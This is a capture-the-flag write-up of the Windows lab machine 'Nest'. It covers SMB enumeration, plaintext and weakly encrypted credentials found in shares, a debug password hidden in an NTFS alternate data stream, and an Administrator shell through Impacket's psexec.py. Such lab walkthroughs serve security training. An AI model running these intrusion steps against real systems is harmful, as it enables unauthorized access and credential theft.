Nest
Don’t get too comfortable!
Nest is an easy difficulty machine running Window. It tests your knowledge in basic enumeration and code analysis to gain access to user and root.
Be sure to checkout the Basic Setup section before you get started.
Enumeration
Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.
Portscan
portscan nest.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-26 07:21 PST
Nmap scan report for nest.htb (10.10.10.178)
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
Host script results:
|_clock-skew: -7m37s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-26T15:17:05
|_ start_date: 2020-01-26T15:09:37
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 207.33 secondsThe Unknown Port
When we get an unknown port that scratches the part of our brain that makes use wonder what is behind that mysterious black hole. Let’s check it out with netcat remembering that it is a Windows machine so we will use the CRLF flag!
Connecting with netcat we find a prompt:
nc -C nest.htb 4386
HQK Reporting Service V1.2
> help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>Typing in help we see a list of commands. We don’t seem to be able to do much so we can assume we need the DEBUG password. Trying a bunch of default passwords returns no results. Let’s continue on and keep an eye out for some passwords.
Samba
Taking a look at port 445 with smbclient we find the following shares:
smbclient -L //10.10.10.178 -U " "%" "
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk None of which seem to be writable when we use our smb-check.sh:
./smb-check.sh
Checking root of share 'ADMIN$'
No, NEST\guest has no access
Checking root of share 'C$'
No, NEST\guest has no access
Checking root of share 'Data'
No, NEST\guest has no access
Checking root of share 'Secure$'
No, NEST\guest has no access
Checking root of share 'Users'
No, NEST\guest has no accessNavigating through the SMB shares we come across something interesting in //10.10.10.178/Data/Shared/Templates/Marketing we come across the file Welcome Email.txt that contains the following:
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: we....19
Thank you
HRUsing the credentials we have found let’s start by mounting shares so we can search them a lot easier.
Let’s start with Data since this is where we found the credentials in the first place:
mount -t cifs -o username=TempUser //10.10.10.178/Data /root/Documents/nest/Shares/DataAnd then we will search for usernames and passwords:
grep -ir "username\|password" .
./IT/Configs/RU Scanner/RU_config.xml: <Username>c.smith</Username>
./IT/Configs/RU Scanner/RU_config.xml: <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
./Shared/Templates/HR/Welcome Email.txt:\\HTB-NEST\Users\<USERNAME>
./Shared/Templates/HR/Welcome Email.txt:Username: TempUser
./Shared/Templates/HR/Welcome Email.txt:Password: welcome2019Looks like we have found some more creds however the password looks like a hash. On further inspection the string doesn’t seem to be any known hash:
hashid fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=
Analyzing 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE='
[+] Unknown hashWe have some more searching to do to see if we can find any hints as to what this password string is encoded as.
User
Searching through the files found in the shares we have access to we find a file called config.xml in Data/IT/Configs/NotepadPlusPlus. Within we find <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />.
Listing the Carl directory we find that we have access:
ls -l Secure\$/IT/Carl
total 0
drwxr-xr-x 2 root root 0 Aug 7 2019 Docs
drwxr-xr-x 2 root root 0 Aug 6 2019 Reports
drwxr-xr-x 2 root root 0 Aug 6 2019 'VB Projects'Looking further we find a Visual Basic project folder:
ls -l Secure\$/IT/Carl/VB\ Projects/WIP
total 0
drwxr-xr-x 2 root root 0 Aug 9 08:36 RULoading the project in Visual Studio we can navigate to the Utils.vb and set a breakpoint at line 114. Running the debug we find the password xRxRx....xRxRx:
Using the password against the users we have found so far we find that we can connect to the c.smith user via smb.
Having a look in the C.Smith folder we find our user flag:
cat Users/C.Smith/user.txt
cf71b25404....05f426e987Let’s move on to root.
Root
In the C.Smith folder we also find the HQK Reporting directory which we know is from the unknown port we enumerated earlier.
Since I want to work on my Win-foo we will move over to a Windows VM and mount the share.
Taking a look at the folder we find a directory and a couple of files:
PS Z:\C.Smith\HQK Reporting> ls
Directory: Z:\C.Smith\HQK Reporting
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/08/2019 8:18 PM AD Integration Module
-a---- 9/08/2019 7:08 AM 0 Debug Mode Password.txt
-a---- 9/08/2019 7:09 AM 249 HQK_Config_Backup.xmlLooks like we have potentially found our DEBUG password for the unknown port. We also find a config file as well as another .exe file called HqkLdap.exe.
Executing HqkLdap.exe we get the following output:
PS Z:\C.Smith\HQK Reporting\AD Integration Module> .\HqkLdap.exe
Invalid number of command line argumentsWe are most likely going to need to analyze this file but for now let’s look in to our DEBUG password!
Taking a look at the file we see that it seems empty. Bit of *Stego maybe? Let’s copy the file to a writable location so we can investigate further:
PS Z:\C.Smith\HQK Reporting> cp '.\Debug Mode Password.txt' C:\Users\user\Desktop\password.txtSince we are in Windows and Nest is a Windows machine let’s take a stab in the dark and check for file streams.
Recently saw this used in a CTF so let’s give it a crack…
We can check for file streams in Windows with PowerShell using the Get-Item cmdlet or we can use Command Prompt with the command dir /R:
PS C:\Users\user\Desktop> Get-Item –Path * -Stream *
PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop\password.txt::$DATA
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop
PSChildName : password.txt::$DATA
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName : C:\Users\user\Desktop\password.txt
Stream : :$DATA
Length : 0
PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop\password.txt:Password
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop
PSChildName : password.txt:Password
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName : C:\Users\user\Desktop\password.txt
Stream : Password
Length : 15Here we find the data stream Password and can view the contents with the cat command:
PS C:\Users\user\Desktop> cat .\password.txt:Password
WBQ....D8wThere is our DEBUG password… hopefully! Let’s go check it out with good ‘ol telnet:
PS C:\Users\user\Desktop> telnet 10.10.10.178 4386
HQK Reporting Service V1.2
>debug WBQ....D8w
Debug mode enabled. Use the HELP command to view additional commands that are now availableNice! Checking options with the HELP command we find that we can navigate directories with the SETDIR command. Let’s change to the parent directory and see what we can find:
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQKWe recognise HQK_Config.xml as we have the backup of it in the HQK reporting share directory. Viewing it’s contents and comparing to the backup we find the backup is missing the DebugPassword setting:
>showquery 3
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>4386</Port>
<DebugPassword>WBQ....D8w</DebugPassword>
<QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>Let’s add that in to our backup as we may need it later with HqkLdap.exe.
Looking in to the LDAP directory we find our HqkLdap.exe and a .conf file that we haven’t seen before:
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAPViewing the file we see another encrypted pasword:
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=Let’s add the username and password to our RU_Config.xml and see if we can decrypt it.
When attempting to decrypt we get a padding error! I think it’s about time we take a look at HqkLdap.exe and see what it does.
On inspection we see it does a few things but something that catches our eye is the encryption function:
CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)This looks familiar. It looks a lot like the inputs in the Decrypt function of DbPof.exe.
Let’s go see:
Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)Sure enough in Utils.vb we see the Decrypt function being called with six inputs which is the exact amount of inputs as the CR.RD function. Let’s change the inputs for DbPof.exe and execute to our breakpoint again:
Sure enough we uncover the password XtH....nGX.
Now, using this password we can access the C$ share and grab the flag from there…
But I have missed an interactive shell throughout this machine so let’s finish off with one:
psexec.py NEST/Administrator:XtH....nGX@nest.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on nest.htb.....
[*] Found writable share ADMIN$
[*] Uploading file aWScCAlj.exe
[*] Opening SVCManager on nest.htb.....
[*] Creating service ykVj on nest.htb.....
[*] Starting service ykVj.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
6594c2eb08....b94b878c41Conclusion
Nest was an interesting machine. It was quite a CTF’y machine, but I enjoyed it. Some people don’t like that, but I feel that it get’s you thinking at least. I wouldn’t mind hearing what you thought about this box so find me on the various social media’s and hit me up!
